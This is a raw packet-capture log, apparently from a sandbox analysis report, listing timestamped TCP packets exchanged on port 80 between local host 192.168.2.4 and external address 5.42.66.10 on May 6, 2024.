May 6, 2024 07:53:08.190794945 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.190803051 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.190805912 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.190818071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.190829039 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.190829992 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.190841913 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.190870047 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.191034079 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.191045046 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.191072941 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.191097975 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.191159964 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.191170931 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.191181898 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.191211939 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.191237926 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.191286087 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.191298962 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.191308975 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.191324949 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.191325903 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.191339016 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.191344976 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.191369057 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.191390038 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.191402912 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.191416025 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.191443920 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.191452026 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.191595078 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.191606998 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.191617966 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.191629887 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.191641092 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.191642046 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.191653967 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.191659927 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.191687107 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.191704988 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.191732883 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.191745043 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.191761017 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.191771984 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.191771984 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.191782951 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.191795111 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.191801071 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.191806078 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.191817045 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.191833019 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.191849947 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.191862106 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.191871881 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.191884041 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.191884995 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.191915035 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.191941023 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.192050934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.192063093 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.192073107 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.192085028 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.192091942 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.192096949 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.192112923 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.192138910 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.192223072 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.192234993 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.192245007 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.192257881 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.192262888 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.192270994 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.192275047 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.192281961 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.192293882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.192303896 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.192333937 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.192368031 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.192380905 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.192393064 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.192404032 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.192406893 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.192416906 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.192426920 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.192435026 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.192440987 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.192451000 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.192456961 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.192473888 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.192497969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.192507982 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.192511082 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.192522049 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.192534924 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.192548990 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.192578077 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.192689896 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.192702055 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.192713022 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.192723989 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.192727089 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.192738056 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.192739964 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.192750931 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.192758083 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.192770004 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.192800045 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.192850113 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.192862988 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.192873001 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.192884922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.192888975 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.192897081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.192898989 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.192909956 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.192920923 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.192920923 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.192945004 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.192958117 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.192975998 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.192987919 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.192998886 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.193011045 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.193015099 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.193022966 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.193027973 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.193048000 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.193068027 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.193103075 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.193114996 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.193125010 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.193137884 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.193147898 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.193166971 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.193180084 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.193249941 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.193262100 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.193274021 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.193285942 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.193289042 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.193300962 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.193315029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.193315983 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.193341970 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.193347931 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.193361998 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.193386078 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.193548918 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.193559885 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.193571091 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.193583012 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.193586111 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.193595886 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.193598986 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.193608999 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.193619013 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.193622112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.193634987 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.193649054 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.193680048 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.193680048 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.193694115 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.193705082 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.193717957 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.193720102 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.193728924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.193747044 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.193773031 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.193850040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.193866014 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.193876028 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.193886995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.193887949 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.193898916 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.193909883 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.193933010 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.193964958 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.193984032 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.193994045 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.194005013 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.194019079 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.194045067 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.194192886 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.194205999 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.194216013 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.194226980 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.194231987 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.194237947 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.194251060 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.194257021 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.194262981 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.194264889 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.194274902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.194303036 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.194308996 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.194319963 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.194333076 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.194344044 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.194356918 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.194358110 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.194367886 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.194380045 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.194384098 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.194394112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.194410086 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.194423914 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.194438934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.194452047 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.194618940 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.194618940 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.194633961 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.194645882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.194657087 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.194670916 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.194683075 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.194684029 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.194694996 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.194706917 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.194717884 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.194720984 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.194730043 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.194749117 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.194760084 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.194761992 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.194772005 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.194783926 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.194783926 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.194788933 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.194796085 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.194818020 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.194842100 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.194927931 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.194938898 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.194950104 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.194961071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.194972038 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.194972992 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.194997072 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.195019960 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.195067883 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.195079088 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.195090055 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.195101976 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.195108891 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.195115089 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.195127010 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.195130110 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.195153952 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.195166111 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.195169926 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.195187092 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.195199013 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.195208073 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.195225954 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.195240021 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.195364952 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.195377111 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.195388079 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.195399046 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.195410967 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.195411921 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.195437908 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.195463896 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.195508957 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.195524931 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.195535898 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.195552111 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.195552111 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.195564985 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.195576906 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.195578098 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.195594072 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.195605993 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.195609093 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.195621967 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.195621967 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.195633888 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.195645094 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.195650101 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.195657969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.195674896 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.195698023 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.195811033 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.195822954 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.195833921 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.195844889 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.195851088 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.195858002 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.195868969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.195874929 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.195879936 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.195900917 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.195919037 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.195920944 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.195935011 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.195960999 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.195987940 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.196129084 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.196141005 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.196151018 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.196163893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.196173906 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.196177006 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.196190119 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.196197987 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.196202993 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.196223974 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.196238995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.196244001 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.196250916 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.196261883 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.196274042 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.196278095 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.196288109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.196305037 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.196330070 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.445538998 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.445555925 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.445568085 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.445579052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.445590973 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.445602894 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.445616007 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.445657015 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.445669889 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.445713043 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.445713043 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.445713043 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.445823908 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.445836067 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.445847988 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.445852995 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.445861101 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.445867062 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.445878029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.445889950 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.445898056 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.445903063 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.445914984 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.445923090 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.445926905 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.445944071 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.445956945 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.445965052 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.445971012 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.445981979 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.445995092 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.445997953 CEST	49741	80	192.168.2.4	5.42.66.10
